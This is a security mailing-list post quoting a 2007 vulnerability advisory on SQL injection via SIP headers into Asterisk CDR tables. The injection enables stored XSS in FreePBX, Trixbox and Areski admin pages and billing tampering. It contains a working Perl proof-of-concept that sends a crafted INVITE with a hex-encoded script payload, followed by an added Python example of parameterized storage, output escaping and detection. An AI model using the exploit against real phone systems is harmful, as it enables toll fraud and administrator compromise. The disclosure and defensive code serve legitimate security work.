LOL !!!!XSS!!!! PDP ALERT !!! THEY ARE STEALING YOUR RESEARCH!
On 10/19/07, Radu State <[EMAIL PROTECTED]> wrote:
>
> In a previous post (http://seclists.org/fulldisclosure/2007/Oct/0174.html), we have seen how XSS injection can be performed over SIP to inject malicious JavaScript into the browser of a user who checks the call history of his phone. In this post, we will detail how XSS injection can be performed over SIP by an additional SQL injection.
>
> Some SIP proxies store information gathered from SIP headers into databases used for billing and accounting purposes. This is also the case for the vulnerability disclosed in the following. If this information is not properly filtered, once it is displayed to the administrator it can perform a second-order SQL injection, that is: during the display, it gets interpreted as SQL by the application. In this case, two things can result: first, the database can be changed (for instance the call length can be changed to a small value and thus the caller can do toll fraud). Sometimes, if the target system is not well secured, SQL injection can lead to system compromise because most database servers allow some interaction with the target OS.
>
> However, the additional feature is that XSS can also result, because JavaScript can be stored into the database with the SQL injection and executed on the browser when the admin checks it (this is a kind of log injection process). As was pointed out in my previous posting, XSS can be used with tools like BeEF and XSS Proxy to scan the internal network, deactivate firewalls; basically all the dangers of CSRF/XSRF are not a reality. The main issue is that most applications that deal with CDR data are not considering this type of threat.
>
> Title: SQL injection in asterisk-addons and XSS injection in WWW application in Areski, FreePBX and Trixbox
>
> Id: KIPH 12
>
> Credits
>
> Humberto Abdelnur (Ph.D student), the Madynes group at INRIA
> Radu State (Ph.D), the Madynes group at INRIA
> Olivier Festor (Ph.D), the Madynes group at INRIA
>
> Software version for which vendors were notified:
>
> Asterisk-addon (SQL injection)
> Areski v 2.0.1 and earlier (XSS injection)
> FreePBX (2.3.00 and earlier) XSS injection
> Trixbox v.2.3.1 and earlier (XSS injection)
>
> Severity: High, XSS and SQL injection can lead to the compromise of an internal network
>
> Overview:
>
> Asterisk as itself does not support billing reports but provides libraries, asterisk-addon, which may allow a third entity to compute them. Specifically, the functions exported by cdr_addon_mysql.c allow logging the Call Detail Records (CDR) in the MySQL database.
>
> Areski, FreePBX and Trixbox use the information stored in such a database in order to manage, compute and generate billing reports or display the load of the PBX.
>
> Vulnerability Synopsis:
>
> Certain functions in cdr_addon_mysql.c do not properly escape input characters from fields of incoming calls before storing them in the database. This issue will allow a malicious user two main attacks:
>
> 1. Inject SQL statements which will obfuscate the quantity of minutes made for the billing
> 2. Inject through the SQL statement values which will be recognized as JavaScript when a WWW management application for CDR runs.
>
> The attack may be performed by an unsubscribed user in the domain (if anonymous calls are allowed). This attacker may inject negative numbers in the CDR table in order to decrease the minutes of calling. Also, the attacker may inject JavaScript tags to be executed by the administrator PC when she/he enters the CDR website.
>
> Note that in order to perform the Cross Script injection, the SQL injection technique is necessary because special characters such as "<" are to be filtered by asterisk, while with the SQL injection they can be rewritten as 0x60 (hexadecimal representation) which won't be filtered.
>
> Impact:
>
> Information from the database can be manipulated for malicious use.
> Malicious scripts may be executed on the administrator machine.
>
> Proof of Concept:
>
> The script will create an entry with duration values -9 and <script>alert(1)</script> that will be shown when the administrator checks the website.
>
> Command: asterisk_cdr_sqlinjection.pl <callUser> <targetIP> <targetPort> <attackerUser> <localIP> <localPort>
>
> --
>
> #!/usr/bin/perl
>
> #############################################
> # Vulnerability discovered using KiF ~ Kiph #
> #                                           #
> # Authors:                                  #
> # Humberto J. Abdelnur (Ph.D Student)       #
> # Radu State (Ph.D)                         #
> # Olivier Festor (Ph.D)                     #
> #                                           #
> # Madynes Team, LORIA - INRIA Lorraine      #
> # http://madynes.loria.fr                   #
> #############################################
>
> use IO::Socket::INET;
> use String::Random;
> $foo = new String::Random;
>
> die "Usage $0 <callUser> <targetIP> <targetPort> <attackerUser> <localIP> <localPort>" unless ($ARGV[5]);
>
> sub iso2hex($) {
>     my $hex = '';
>     for (my $i = 0; $i < length($_[0]); $i++) {
>         my $ordno = ord substr($_[0], $i, 1);
>         $hex .= sprintf("%lx", $ordno);
>     }
>
>     $hex =~ s/ $//;
>     $hex;
> }
>
> $callUser = $ARGV[0];
> $targetIP = $ARGV[1];
> $targetPort = $ARGV[2];
>
> $attackerUser = $ARGV[3];
> $attackerIP= $ARGV[4];
> $attackerPort= $ARGV[5];
>
> $socket=new IO::Socket::INET->new(
>     Proto=>'udp',
>     PeerPort=>$targetPort,
>     PeerAddr=>$targetIP,
>     LocalPort=>$attackerPort);
>
> $scriptinjection= iso2hex("<script>alert(1)</script>");
> $sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*";
>
> $callid= $foo->randpattern("CCccnCn");
> $cseq = $foo->randregex('\d\d\d\d');
>
> $sdp = "v=0\r
> o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
> s=-\r
> c=IN IP4 $attackerIP\r
> t=0 0\r
> m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
> a=sendrecv\r
> a=ptime:20\r
> a=maxptime:200\r
> a=fmtp:96 mode-change-neighbor=1\r
> a=fmtp:18 annexb=no\r
> a=fmtp:98 0-15\r
> a=rtpmap:96 AMR/8000/1\r
> a=rtpmap:0 PCMU/8000/1\r
> a=rtpmap:8 PCMA/8000/1\r
> a=rtpmap:97 iLBC/8000/1\r
> a=rtpmap:18 G729/8000/1\r
> a=rtpmap:98 telephone-event/8000/1\r
> a=rtpmap:13 CN/8000/1\r
> ";
> $sdplen= length $sdp;
>
> $msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport\r
> From: <sip:[EMAIL PROTECTED]>;tag=1\r
> To: <sip:[EMAIL PROTECTED]>\r
> Call-ID: [EMAIL PROTECTED]
> CSeq: $cseq INVITE\r
> Max-Forwards: 70\r
> Contact: <sip:[EMAIL PROTECTED]>\r
> Content-Type: application/sdp\r
> Content-Length: $sdplen\r
> \r
> $sdp";
>
> $socket->send($msg);
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
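The quoted advisory describes two unescaped boundaries (SIP header into the CDR table, CDR table into the admin page) plus a -9 duration tampering. As an added defender-side example that is not from the advisory, the PoC or any of the named projects, the Python below stores the PoC's hostile From value with a parameterized insert so it stays inert data, HTML-escapes it on output, and runs a detection pass over the rows; sqlite3 stands in for MySQL, and the CDR column names are an assumption modelled on a typical Asterisk CDR table, not taken from cdr_addon_mysql.c.

```python
import html
import sqlite3

# Constructed sample CDR rows (clid, src, dst, duration, billsec); the column
# names are an assumption, not taken from cdr_addon_mysql.c. Row 2 carries the
# hostile From value the advisory's PoC builds; row 3 is the entry the advisory
# says the injection leaves behind (-9 timings and a stored script tag).
SCRIPT_HEX = "<script>alert(1)</script>".encode().hex()
SAMPLE_CDRS = [
    ("alice", "alice", "1001", 42, 40),
    ("',1,2,3,4,5,-9,-9,0x" + SCRIPT_HEX + ",6,7,8)/*", "attacker", "1001", 30, 28),
    ("<script>alert(1)</script>", "bob", "1002", -9, -9),
]

def load_cdrs(rows):
    """Insert CDR rows with bound parameters: the driver sends values as data,
    so a quote or comment marker in a SIP header cannot change the statement."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cdr (clid TEXT, src TEXT, dst TEXT, "
               "duration INTEGER, billsec INTEGER)")
    db.executemany("INSERT INTO cdr VALUES (?, ?, ?, ?, ?)", rows)
    return db

def render_row(row):
    """Render one CDR row for an admin page, HTML-escaping every field on output
    so a stored <script> tag is displayed as text rather than executed."""
    cells = "".join("<td>%s</td>" % html.escape(str(v)) for v in row)
    return "<tr>%s</tr>" % cells

def suspicious_cdrs(db):
    """Detection pass over stored CDRs: flag negative timings (billing tampering)
    and SQL/HTML metacharacters in caller fields (injection attempts)."""
    flagged = []
    query = "SELECT clid, src, dst, duration, billsec FROM cdr ORDER BY rowid"
    for row in db.execute(query):
        clid, src, _dst, duration, billsec = row
        reasons = []
        if duration < 0 or billsec < 0:
            reasons.append("negative timing")
        caller = clid + src
        if any(ch in caller for ch in "'<>") or "/*" in caller:
            reasons.append("metacharacters in caller field")
        if reasons:
            flagged.append((row, reasons))
    return flagged

if __name__ == "__main__":
    db = load_cdrs(SAMPLE_CDRS)
    for row, reasons in suspicious_cdrs(db):
        print(render_row(row), reasons)
```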